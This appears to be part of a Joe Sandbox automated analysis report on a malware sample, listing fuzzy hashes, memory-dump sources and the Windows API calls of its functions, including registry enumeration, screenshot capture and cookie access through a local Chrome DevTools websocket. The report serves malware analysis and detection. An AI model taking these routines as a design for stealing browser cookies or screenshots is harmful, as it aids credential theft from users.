                                                                                                                                                                                                                                                  • Opcode ID: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction ID: 4360d2599e00573e4b65a519fd0795226561beaba091f7c302f61e0dfa65ca38
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02210131BB60F089C750AF3AC8645EB37A0CAEB2063EE59A5D9C087B13C315C54BC765
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction ID: 35ca647861992a04f7116d43d558dea2e88f258927ac75a441229ba760d162bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65e2a439953312a9a8ea81f5a1155d2a4eae54898f405db5e57d7af74f4cbf92
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C21F621BB60F08DC750AF39D974AE737A1CAEB2067EE59A8D5C087A63C315C50BC761
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205131048.0000000000A29000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A29000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_a29000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction ID: 1a135397043151056d979162b66cfad673380a00a738e5aa02b80fd0b1159db1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67113C72340110AFD754DF59EC85EA773EAEB89720B298065ED08CB316D676EC42C760
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction ID: 102f9b015f559d5b5fdc9428360cf24180a7eae29d0d7f77dfe56e77c5757729
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5101A276A006048FDF21CF64CA05BEB33E9FBC6726F4545A5D90A9B2C1E774A9418F90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction ID: 1259609da0929a4548f3b5f1d0ab8ac575e75c7b85c17dd5cc06218d51989e3d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00da29225f77e9d5da32745d240cc18ea26974cc633fae998fa750d1030bcb90
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9AE086733013149BC620CB49ECC4D86B7AEEFC56B475A4132E90057315D2A1AC50C674
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                  • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010CB
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004010D8
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315C9), ref: 004010FF
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315CC), ref: 00401124
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315CF), ref: 00401149
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D2), ref: 0040116E
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D5), ref: 00401199
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315C9), ref: 004011A1
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315D8), ref: 004011C2
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DB,?,004315D8), ref: 004011E7
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DE,?,004315DB,?,004315D8), ref: 0040120C
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401231
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 00401256
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040125E
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,004315E7,?,004315DB,?,004315E4,?,004315E1,?,004315DE,?,004315DB,?,004315D8), ref: 0040127F
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040128C
                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040129F
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004012B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetstrcmp$ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3817037828-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E5A
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E73
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E84
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C0E95
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00643CD2,00000000,00000001,?), ref: 009C0EFE
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,00643D28,00643D10,00000010,00000000,?,00000004), ref: 009C0F7B
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009C0F98
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 009C0FCC
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00643D32,00000000,00000009,?), ref: 009C1033
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C106B
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrlen.KERNEL32(?,?,?,?,?,009B1847,?,0042EEFC), ref: 009C3AE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B09
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcat.KERNEL32(00000000,?), ref: 009C3B11
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A27: lstrcpy.KERNEL32(00000000), ref: 009C3A5F
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643D88,0000FFFF,00000000,?,00000004,?,?,?), ref: 009C11E3
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643DB0,00000002,00000000,?,?,?,?,00643DA0,?,?,?,?,?), ref: 009C12DA
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A6D: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3AAD
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A6D: lstrcat.KERNEL32(00000000,0042EEFC), ref: 009C3AB7
                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32(?,?,00643DC0,00000002,00000000,?,?,?,?,00643BBD,?,?,?), ref: 009C1375
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042EEFC,?,?,00643DD0), ref: 009C13D2
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C1490
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00643BC0), ref: 009C151C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Valuememset$Closelstrcpy$EnumOpenlstrcat$lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 327098194-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 0040970E
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetReadFile.WININET(00000000,?,00001000), ref: 00409734
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetCloseHandle.WININET(00000000), ref: 00409746
                                                                                                                                                                                                                                                    • Part of subcall function 00409638: InternetCloseHandle.WININET(19d), ref: 00409750
                                                                                                                                                                                                                                                    • Part of subcall function 0041278E: strlen.MSVCRT ref: 0041279E
                                                                                                                                                                                                                                                    • Part of subcall function 0041278E: memcmp.MSVCRT(?,?,00000000), ref: 004127C5
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A895
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,ws://localhost:9223,00000000,localhost,0042EEFC), ref: 0040A8FA
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,00000000), ref: 0040A954
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,0042EEFC,00000000), ref: 0040A96B
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040A9D8
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,0042EEFC,00000000), ref: 0040AA08
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internetlstrcat$CloseFileHandleRead$memcmpmemcpymemsetstrlen
                                                                                                                                                                                                                                                  • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                  • API String ID: 1951979638-4155744131
                                                                                                                                                                                                                                                  • Opcode ID: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
                                                                                                                                                                                                                                                  • Instruction ID: cb497cd3caf05907a7207c2bc0cb865dc1d22c80e8fc0a0c68342ace2b668139
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d9a63772d8fc80b55ca352ee1af688ab2a6bdb05e2b97055c5b68e1efb0ed4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2A135B49003549BDB01EF34DC81BAA77B9BF42308F00542DE491677D2DBB8AAC6CB95
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$memsetstrcmp$ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3817037828-0
                                                                                                                                                                                                                                                  • Opcode ID: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
                                                                                                                                                                                                                                                  • Instruction ID: a98ff79f154a8826de77fdd5a30b5a8c32a8b8d149e5be3ae89e99ec89d37e9a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abc8560da33bf2fb35fd7676998d50ed9d1deec662aada542982aacc3b18bb14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541F520A442847AE722D721EE8DBD93EEA9FD6318F80303AF042511F1DBAD0548C32E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,00000000,00020019,0042EEFC), ref: 009C4532
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C4573
                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019), ref: 009C45DB
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,?,?), ref: 009C4608
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C461F
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,0064403B), ref: 009C46B6
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,00644040), ref: 009C472D
                                                                                                                                                                                                                                                  • RegEnumKeyExA.ADVAPI32 ref: 009C4759
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 009C476D
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009C4777
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Close$EnumOpenQueryValue$lstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID: ?
                                                                                                                                                                                                                                                  • API String ID: 2954784806-1684325040
                                                                                                                                                                                                                                                  • Opcode ID: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
                                                                                                                                                                                                                                                  • Instruction ID: 116c8534acc1b78089cd4ef4d5e5b6cc07c4bcb23fc2217778ddf74460eeacc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af859ca9dc6edd80a9ec9f16aa9c02abffaa3d524dfc5d6bcc5b65d79d611d53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3661CC31608344AFE321AF60DD96F6ABBE9BFC6708F00980DF68483151DB759A58CB53
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 009C4F36
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009C4F40
                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 009C4F4D
                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009C4F7D
                                                                                                                                                                                                                                                  • GetHGlobalFromStream.COMBASE(?,?), ref: 009C5019
                                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(?), ref: 009C5021
                                                                                                                                                                                                                                                  • GlobalSize.KERNEL32(?), ref: 009C5037
                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 009C509D
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 009C50B8
                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 009C50BF
                                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 009C50CC
                                                                                                                                                                                                                                                  • CloseWindow.USER32(?), ref: 009C50D3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: GlobalObject$Window$DeleteSelectStream$CloseCreateDesktopFromLockRectReleaseSize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3547074919-0
                                                                                                                                                                                                                                                  • Opcode ID: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
                                                                                                                                                                                                                                                  • Instruction ID: c4676fe286882739ca0b391261ab3372e4b9c813438ee8f75903237fd6f30404
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786feabe4aac4ce43d01109e92d56cb5fec2791526f4185d5024407780f808c1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC511975900219EFDF11DFA0DC4AFEEBBB9FF49350B009119F901A2160EB70AA55CBA1
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 009C165B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(0042EEFC,0042EEFC,0042EEFC,0042EEFC,?,00000028,0042EEFC), ref: 009C1694
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C16EE
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C174F
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C17B1
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 009C1843
                                                                                                                                                                                                                                                    • Part of subcall function 009C53D7: malloc.MSVCRT ref: 009C53E8
                                                                                                                                                                                                                                                    • Part of subcall function 009C3A27: lstrcpy.KERNEL32(00000000), ref: 009C3A5F
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: lstrlen.KERNEL32(?,00000000,?,00000000,?,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1AD
                                                                                                                                                                                                                                                    • Part of subcall function 009BB19F: LocalAlloc.KERNEL32(00000040,00000000,?,009B882B,00000000,?,?,?,?,?,?,?), ref: 009BB1D8
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 009C1A34
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 009C1A92
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00643BBD), ref: 009C1A9A
                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 009C1AD4
                                                                                                                                                                                                                                                    • Part of subcall function 009C39DF: lstrlen.KERNEL32(00000000,?,?,009B883E,0042EEFC,00000000,?,?,?,?,?,?,?), ref: 009C39E8
                                                                                                                                                                                                                                                    • Part of subcall function 009C39DF: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3A19
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrlen.KERNEL32(?,?,?,?,?,009B1847,?,0042EEFC), ref: 009C3AE0
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcpy.KERNEL32(00000000,00000000), ref: 009C3B09
                                                                                                                                                                                                                                                    • Part of subcall function 009C3AC7: lstrcat.KERNEL32(00000000,?), ref: 009C3B11
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C1AF2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen$lstrcatlstrcpy$strtok_s$AllocHeapLocalProcessmalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2997608458-0
                                                                                                                                                                                                                                                  • Opcode ID: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
                                                                                                                                                                                                                                                  • Instruction ID: 4c33523a4f1e17428f0b21ece02aaccf23b6921be4c102c0a5ee20b88bdffada
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a68134cb651d9ddd32a15a0d10eae0307fd36d674900b40827a4ca3a86a29651
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE12E434E006659ADB01EF74DC92FAE7B7AAF86300F04A11DF40167292DFB45B46CB96
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8D7
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F8F6
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041F919
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Similarity
